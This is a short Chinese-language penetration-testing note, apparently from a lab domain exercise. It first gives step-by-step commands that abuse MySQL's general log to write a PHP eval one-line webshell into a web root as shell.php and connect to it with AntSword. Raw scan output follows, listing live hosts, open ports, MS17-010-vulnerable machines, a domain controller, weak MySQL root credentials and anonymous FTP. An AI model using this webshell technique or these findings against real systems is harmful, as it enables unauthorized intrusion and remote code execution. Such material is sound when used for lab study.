1.查看日志功能是否开启 show global variables like '%general%' 2.未开启的话设置为 on set global general_log='ON' 3.开启后将日志文件的存储位置改为可访问到的目录, 根目录即可 set global general_log_file = 'C:/phpStudy1/WWW/shell.php' 4.执行下边一句话木马 数据库将会将查询语句保存在日志文件中 SELECT '<?php @eval($_POST["cmd"]); ?>' 5.写入成功后 使用蚁剑连接
start infoscan (icmp) Target '192.168.52.138' is alive (icmp) Target '192.168.52.141' is alive (icmp) Target '192.168.52.143' is alive icmp alive hosts len is: 3 192.168.52.138:445 open 192.168.52.143:139 open 192.168.52.141:21 open 192.168.52.141:7001 open 192.168.52.143:3306 open 192.168.52.143:445 open 192.168.52.141:445 open 192.168.52.141:139 open 192.168.52.138:139 open 192.168.52.143:135 open 192.168.52.138:135 open 192.168.52.143:80 open 192.168.52.138:80 open 192.168.52.138:88 open 192.168.52.141:7002 open 192.168.52.141:8099 open 192.168.52.141:8098 open 192.168.52.141:135 open
[09/20 03:05:57][+] received output: alive ports len is: 18 start vulscan NetInfo: [*]192.168.52.143 [->]stu1 [->]192.168.52.143 [->]169.254.129.186 [->]192.168.197.143 [+]192.168.52.143 MS17-010 (Windows 7 Professional 7601 Service Pack 1) [+] mysql:192.168.52.143:3306:root 123456 NetInfo: [*]192.168.52.138 [->]owa [->]192.168.52.138 NetInfo: [*]192.168.52.141 [->]root-tvi862ubeh [->]192.168.52.141 [*] WebTitle:http://192.168.52.141:7002 code:200 len:2632 title:Sentinel Keys License Monitor [*]192.168.52.143 GOD\STU1 Windows 7 Professional 7601 Service Pack 1 [+]192.168.52.138 MS17-010 (Windows Server 2008 R2 Datacenter 7601 Service Pack 1) [*]192.168.52.138[+]DC GOD\OWA Windows Server 2008 R2 Datacenter 7601 Service Pack 1 [*]192.168.52.141 __MSBROWSE__\SNTL_ROOT-TVI86 [*] WebTitle:http://192.168.52.141:8099 code:403 len:1409 title:The page must be viewed over a secure channel [+]192.168.52.141 MS17-010 (Windows Server 20033790)
[09/20 03:05:58][+] received output: [*] WebTitle:http://192.168.52.138 code:200 len:4 title:IIS7
[09/20 03:05:58][+] received output: [+] ftp://192.168.52.141:21:anonymous